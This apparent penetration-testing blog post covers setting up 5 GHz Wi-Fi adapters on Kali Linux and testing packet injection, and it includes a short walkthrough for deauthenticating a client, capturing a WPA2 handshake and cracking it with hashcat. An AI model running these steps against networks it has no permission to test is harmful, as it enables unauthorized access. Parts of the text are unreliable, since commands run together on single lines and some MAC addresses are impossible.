How to get your new 5 GHz wireless penetration gear up and working
What new wireless .ac cards work with the latest rolling Kali release (4.14)?
As of February 6th, you can download or upgrade to the latest rolling release of Kali Linux 2018.1. Here’s a quick run down of what to do to ensure your gear is working for your next wireless penetration test. No wireless cards only a few routers can be used packet injection.
The Realtek Chipset based wireless USB cards are now commonplace, like the evil looking Alfa AC1200 & AC1900 WiFi adapters which are currently sold on Amazon. They support 5 GHz as well, but dependent on versions and the Realtek chip set aren't consistent at this time due to driver issues. Cards like like the Ralink MediaTek RT3572 Chipset based cards work out the box and have solid driver support, but have their issues as well.
AWUS052NH
Performs passive and offensives discovery and attack modes for both 2.4 and 5 GHz bands.
Works out the box for Kali 4.14 and supports injection.
root@kali:~# lsusb
Bus 001 Device 002: ID 148f:3572 Ralink Technology, Corp. RT3572 Wireless Adapter
# airmon-ng start wlan0#history
1 apt-get update && apt-get upgrade
2 apt-get dist-upgrade
root@kali:~#uname -ar
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux— After a reboot —
Out of 3 cards tested so far with the latest Kali rolling release the only one that work out the box is the AWUS052NH in the 5GHz world. Any other card you’re dealing with an unstable and not finalized driver. Your mileage will vary depending on your version of Kali. If you like rolling updates, then buyer beware.
Install Wireless Drivers with Kali rolling
AWUS036ACH & AWUS1900
$ apt install realtek-rtl88xxau-dkmsSetting monitor mode manually
You have to set the monitor mode manually on the AWUS036ACH & AWUS1900 cards at this time.
Set interface down
$ sudo ip link set wlan0 downSet monitor mode
$ sudo iwconfig wlan0 mode monitorSet interface up
$sudo ip link set wlan0 up
for switching channels (interface must be up)
Set channel 6, width 40 MHz:$ sudo iw wlan0 set channel 6 HT40-
Set channel 149, width 80 MHz:$ sudo iw wlan0 set freq 5745 80 5775
for setting TX power (doesn’t work on every card)
$ sudo iwconfig wlan0 txpower 30or$ sudo iw wlan0 set txpower fixed 3000
Troubleshooting
If you run into Linux header issues when install your new wireless drives it may be due to the latest rolling release . My suggestion, look through your Linux images and install the requirements
apt-cache search linux-imageEnsure you installed the requirements and/or manually install the drivers.
apt install dkms &&
apt-get install bc &&
apt-get install build-essential &&
apt-get install linux-headers-$(uname -r)
git clone https://github.com/aircrack-ng/rtl8812auTest
Ensure your card is now working in monitor mode. I like to make sure the card is working with the aircrack-ng suite installed by default before I install the latest kismet. I usually do this for passive recon before I start testing offensively.
airodump-ng wlan1 --band ag -M -U --wps --beacons -w captureallthewireless#ifconfig wlan0
#aireplay-ng wlan0 -9
10:09:24 Trying broadcast probe requests..
Install the latest Kismet
Installation instructions taken from kismet’s git page.sudo apt-get install build-essential git libmicrohttpd-dev \ zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev \ libpcap-dev libncurses5-dev libnm-dev libdw-dev \
libsqlite3-dev
Clone Kismet from git. If you haven't cloned Kismet before:
$ git clone https://www.kismetwireless.net/git/kismet.git
$ cd kismet
$ git pull
$ cd kismet
$ ./configureCompile Kismet.
$ make
Kismet
./kismet wlan0
Point your browser at http://localhost:2501
This is my own Kali box above, shown working with a card in monitor mode and the web interface accessible locally. I really like the new UI web interface. It’s great for interacting with your data, and with cool tools like the KismetMobileDashboard and the upcoming support for more software defined radios like the HackRF coming; Kismet has some awesome ways to interact with tons of useful AP and client info for WiFi and Bluetooth.
Cool, so we should have a VM running Kali 4.14 with .ac support, and injection support for Part 2. This should give us a nice new working Kali install that’s a reproducible environment to test some newer attacks.
Next time we’we’ll look at offensive wireless attacks that I’ve used on clients while performing wireless penetration testing for companies. Wireless attacks that I’ll describe have been used to breach some of the largest companies , from Fortune 5’s to small and medium businesses alike.
802.11ac Wireless Attacks
Part 2:
- Configuration of your device for injection attacks that can be used with .ac wireless access points
- How to perform deauth attacks on 5 GHz channels
- How to capture a 4 way handshake, for a wireless network using WPA2-PSK that’s broadcasting on a 5 GHz channel
- How to convert the handshake to the right format, so we can brute force it with hashcat.
We’ll also discuss in part 3 in detail about advanced wireless offensive attacks that not only lure clients to connect, but perform man-in-the-middle attacks and/or network attacks against the unsuspecting victims. Part 3 will take a deep dive into common offensive wireless attacks.
AWUS036ACH after setting the channel:
iwconfig wlan1 channel 149Lets test the interface using native tools to rule out any channel, driver or aircrack-ng specific nuances with this version the Realtek 5 GHz compatible USB device, and the latest release of Kali.
Remember we have lots of variables in the mix, so your mileage may vary depending on Operating System type and driver.
root@kali:~# aireplay-ng |moreAireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
https://www.aircrack-ng.orgusage: aireplay-ng <options> <replay interface>Filter options:-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Lets test injection:
root@kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:10 Trying broadcast probe requests...
10:53:12 No Answer...
10:53:12 Found 1 AP10:53:12 Trying directed probe requests...
10:53:12 C4:E9:84:9F:60:71 - channel: 0 - 'shameless-karma!'
10:53:18 0/30: 0%root@kali:~# iwconfig wlan1 channel 149
It performs injection perfectly AFTER hard coding the channel we’re sniffing
kali:~# aireplay-ng -D --test -e ssid -a P4:E4:E4:92:60:71 wlan1
10:53:27 Trying broadcast probe requests...
10:53:29 No Answer...
10:53:29 Found 1 AP10:53:29 Trying directed probe requests...
10:53:29 P4:E4:E4:92:60:71 - channel: 0 - 'shameless-karma!'
10:53:29 Ping (min/avg/max): 0.914ms/2.795ms/5.201ms Power: -37.61
10:53:29 28/30: 93%10:53:29 Injection is working!
Let’s try the Fake authentication de-authentication method on 5 GHz:
aireplay-ng -D --fakeauth 6000 -o 1 -q 10 -a 20:AA:XX:XX:XX:XX \
-h E0:F8:XX:XX:XX:XX -e MYISPSUCKS-5G wlan0monWhere:
- -6000 — Re-authenticate very 6000 seconds. The long period also causes keep alive packets to be sent.
- -o 1 — Send only one set of packets at a time. Default is multiple and this confuses some APs.
- -q 10 — Send keep alive packets every 10 seconds.
- -h
E0:F8:XX:XX:XX:XXis our card MAC address - -e
MYISPSUCKS-5Gis the wireless network name
Let’s tie it all together, send some deuath packets to a client; and grab a 5 GHz 4 way handshake from an access point using WPA2-PSK.
# put your network device into monitor mode
Set interface down
$ sudo ip link set wlan0 downSet monitor mode
# iwconfig wlan0 mode monitorSet interface up
# ip link set wlan0 up# listen for all nearby beacon frames to get target BSSID and
# airodump-ng wlan0 --band abgSet 5 GHz channel
# iwconfig wlan0 channel 149Start listening for the handshake
# airodump-ng -c 149 --bssid P4:E4:E4:92:60:71 -w cap01.cap wlan0Optionally deauth a connected client to force a handshake
# aireplay-ng -D -0 2 -a 9C:5C:8E:C9:AB:C0 -c P4:E4:E4:92:60:71 wlan0Convert cap to hccapx
# root@kali:~# aircrack-ng -J file.cap capture.hccapCrack with hashcat:>hashcat.exe -m 2500 capture.hccapx rockyou.txt
For any issues when converting .cap captures try, wpaclean or
git clone https://github.com/wpatoolkit/Cap-Converter5 GHz Injection Tests
The cards tested below support injection, with little to no manual driver configuration with the latest Kali rolling
This is meant to supplement the aircrack-db test database for the newer Alfa cards,I’ve had a chance to test for injection in the 802.11.ac spectrum.
apt install realtek-rtl88xxau-dkmsWorking cards
- Alfa AC1200
- Alfa AWUS052NH
- Alfa AWUS036NH
- Alfa AWUS036ACH
1 set of Contenders:
Score 100%
- Alfa AC1200
- Alfa AWUS1900
root@kali:~# airmon-ngPHY Interface Driver Chipsetphy0 wlan0 8814au Realtek Semiconductor Corp.
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770root@kali:~# iwconfig wlan2 channel 149root@kali:~# iwconfig wlan3 channel 56
root@kali:~# aireplay-ng -D -9 -i wlan2 wlan314:55:33 Trying broadcast probe requests...
14:55:34 No Answer...
14:55:34 Found 1 AP14:55:34 Trying directed probe requests...
14:55:34 P4:29:88:9F:60:71 - channel: 149 - 'ssid'
14:55:35 Ping (min/avg/max): 0.735ms/3.759ms/9.462ms Power: -37.77
14:55:35 30/30: 100%14:55:35 Injection is working!14:55:35 Trying card-to-card injection...
14:55:35 Attack -0: OK
14:55:35 Attack -1 (open): OK
14:55:35 Attack -1 (psk): OK
14:55:35 Attack -2/-3/-4/-6: OK
14:55:35 Attack -5/-7: OK
root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.
2nd set of Contenders
Score 90%
- Alfa AWUS052NH
- Alfa AWUS036NH
root@kali:~# iwconfig wlan1 channel 36
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan4
root@kali:~# iwconfig wlan4 channel 149
root@kali:~# aireplay-ng -D -9 -i wlan1 wlan415:10:11 Trying broadcast probe requests...
15:10:13 No Answer...
15:10:13 Found 1 AP15:10:13 Trying directed probe requests...
15:10:13 BF:E9:54:9F:T0:71 - channel: 149 - 'shameonyou'
15:10:13 Ping (min/avg/max): 0.330ms/6.444ms/12.453ms Power: -26.00
15:10:13 30/30: 100%15:10:13 Injection is working!15:10:13 Trying card-to-card injection...
15:10:13 Attack -0: OK
15:10:13 Attack -1 (open): OK
15:10:13 Attack -1 (psk): OK
15:10:13 Attack -2/-3/-4/-6: OK
15:10:17 Attack -5/-7: Failed
root@kali:~# iwconfig
wlan2 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.wlan1 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan4 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=30 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.452 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan3 IEEE 802.11 Mode:Monitor Frequency:5.745 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.root@kali:~# airmon-ngPHY Interface Driver Chipsetphy0 wlan0 8814au Realtek Semiconductor Corp.
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572
phy3 wlan2 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy5 wlan3 8812au Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
phy4 wlan4 rt2800usb Ralink Technology, Corp. RT2770
3rd set of Contenders
Score 50%
- Alfa AWUS036ACH — 100%
- Alfa AWUS1900–50 %
root@kali:~# aireplay-ng -D -9 wlan0 wlan1
"aireplay-ng --help" for help.
root@kali:~# aireplay-ng -D -9 wlan1
15:20:11 Trying broadcast probe requests...
15:20:13 No Answer...
15:20:13 Found 0 APs
root@kali:~# iwconfig wlan1 channel 149
root@kali:~# aireplay-ng -D -9 wlan1
15:20:21 Trying broadcast probe requests...
15:20:21 Injection is working!
15:20:23 Found 1 AP15:20:23 Trying directed probe requests...
15:20:23 V4:E9:F4:9F:Z0:71 - channel: 149 - 'yourssidrules'
15:20:23 Ping (min/avg/max): 0.901ms/10.325ms/14.429ms Power: -26.00
15:20:23 30/30: 100%root@kali:~# aireplay-ng -D -9 wlan0
15:20:47 Trying broadcast probe requests...
15:20:49 No Answer...
15:20:49 Found 0 APs
root@kali:~# airmon-ngPHY Interface Driver Chipsetphy6 wlan0 8814au Realtek Semiconductor Corp. - partially working
phy1 wlan1 rt2800usb Ralink Technology, Corp. RT3572 - woring
